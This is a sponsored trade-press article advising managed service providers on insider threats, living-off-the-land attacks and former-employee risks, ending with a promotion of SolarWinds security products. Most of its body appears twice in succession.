Staving Off Inside Threats
August 3, 2020
Beware of internal bad actors and prying eyes
The Channelnomics Staff
When we think of cybersecurity breaches, we often conjure up images of so-called black hats – miscreants with hooded garments sitting in dark corners as they churn up malicious code and whip up insidious plans for ransomware, worms, and the like. We sometimes forget about the inside threats, such as employee carelessness, hijacked admin tools, and disgruntled ex-staffers.
But those threats are real – as real as all the others – and MSPs need to take a 360-degree view of client security, especially today, as the coronavirus rages across the globe and forces employers to deploy widely dispersed, heterogeneous networks.
Here are three areas that MSPs need to keep their eyes on:
Clients – The Enemy Within. According to a survey by IDC on behalf of SolarWinds, more than 60% of respondents cited insiders as their biggest threat. Among respondents to a Crowd Research Partners survey, 55% said the same. The consensus: A number of high-profile breaches result directly from inadequate management of access privileges and unintentionally exposed administrative credentials.
MSPs can do a handful of things to minimize the potential for inside security risks. For one thing, it’s critical to educate customers and their staffs in this area and encourage them to implement strong HR policies that include background checks and a plan for employee offboarding. In addition, a Zero Trust identity policy, stringent identity management and access protocols, and remote monitoring and management (RMM) solutions that allow you to check for potential threats (such as Active Directory changes or mass file deletions) could go a long way toward protecting clients – and you.
Living off the Land (LotL) Attacks. Notoriously difficult to discover, these attacks occur when a threat actor takes control of a trusted administrative tool, such as PowerShell, to move from machine to machine in an IT environment. LotL attacks are especially popular among sophisticated cybercriminal groups, and their targets are often MSPs: Compromising one managed service provider means gaining access to all of that MSP’s customers. A good way to prevent and detect LotL attacks is to take a defense-in-depth approach by layering multiple security technologies, such as patch management, web protection, e-mail security, AI-driven endpoint protection, secure credential management, and user and network access segmentation.
Former employees. While existing staffers present enough risk of their own, ex-staffers can pose an even greater danger. Former workers have inside knowledge of an employer’s data, operations, and systems. If that information gets into the wrong hands, whether because a disgruntled ex-employee deliberately puts it there or because an ex-staffer still has access to an application or account that gets compromised, a breach’s consequences – financial, reputational, or otherwise – could be disastrous.
To reduce the risk attached to ex-employees – whether customers’ or your own – companies should, ironically enough, plan for a new staffer’s exit upon onboarding, keeping tabs on all devices that are given out and all services that’ll be accessed. When somebody does leave, all equipment should be recovered, all account access should be shut down immediately, accounts should be monitored for attempted access, and employees should be trained on good security hygiene. They should know not to copy data outside of the organization, share passwords, or grant a former employee unsupervised access to a physical location.
SolarWinds offers a number of tools and resources to help MSPs protect customers – and themselves – from cyberattacks, inside and otherwise. The company’s Endpoint Detection and Response (EDR) integrates with its RMM, allowing MSPs to use it from the same platform they use to support customers. There’s also SolarWinds Mail Assure for e-mail security and SolarWinds PassPortal for credential management. Visit the SolarWinds MSP website to find out all about the company’s solutions.
But those threats are real – as real as all the others – and MSPs need to take a 360-degree view of client security, especially today, as the coronavirus rages across the globe and forces employers to deploy widely dispersed, heterogeneous networks.
Here are three areas that MSPs need to keep their eyes on:
Clients – The Enemy Within. According to a survey by IDC on behalf of SolarWinds, more than 60% of respondents cited insiders as their biggest threat. Among respondents to a Crowd Research Partners survey, 55% said the same. The consensus: A number of high-profile breaches result directly from inadequate management of access privileges and unintentionally exposed administrative credentials.
MSPs can do a handful of things to minimize the potential for inside security risks. For one thing, it’s critical to educate customers and their staffs in this area and encourage them to implement strong HR policies that include background checks and a plan for employee offboarding. In addition, a Zero Trust identity policy, stringent identity management and access protocols, and remote monitoring and management (RMM) solutions that allow you to check for potential threats (such as Active Directory changes or mass file deletions) could go a long way toward protecting clients – and you.
Living off the Land (LotL) Attacks. Notoriously difficult to discover, these attacks occur when a threat actor takes control of a trusted administrative tool, such as PowerShell, to move from machine to machine in an IT environment. LotL attacks are especially popular among sophisticated cybercriminal groups, and their targets are often MSPs: Compromising one managed service provider means gaining access to all of that MSP’s customers. A good way to prevent and detect LotL attacks is to take a defense-in-depth approach by layering multiple security technologies, such as patch management, web protection, e-mail security, AI-driven endpoint protection, secure credential management, and user and network access segmentation.
Former employees. While existing staffers present enough risk of their own, ex-staffers can pose an even greater danger. Former workers have inside knowledge of an employer’s data, operations, and systems. If that information gets into the wrong hands, whether because a disgruntled ex-employee deliberately puts it there or because an ex-staffer still has access to an application or account that gets compromised, a breach’s consequences – financial, reputational, or otherwise – could be disastrous.
To reduce the risk attached to ex-employees – whether customers’ or your own – companies should, ironically enough, plan for a new staffer’s exit upon onboarding, keeping tabs on all devices that are given out and all services that’ll be accessed. When somebody does leave, all equipment should be recovered, all account access should be shut down immediately, accounts should be monitored for attempted access, and employees should be trained on good security hygiene. They should know not to copy data outside of the organization, share passwords, or grant a former employee unsupervised access to a physical location.
SolarWinds offers a number of tools and resources to help MSPs protect customers – and themselves – from cyberattacks, inside and otherwise. The company’s Endpoint Detection and Response (EDR) integrates with its RMM, allowing MSPs to use it from the same platform they use to support customers. There’s also SolarWinds Mail Assure for e-mail security and SolarWinds PassPortal for credential management. Visit the SolarWinds MSP website to find out all about the company’s solutions.
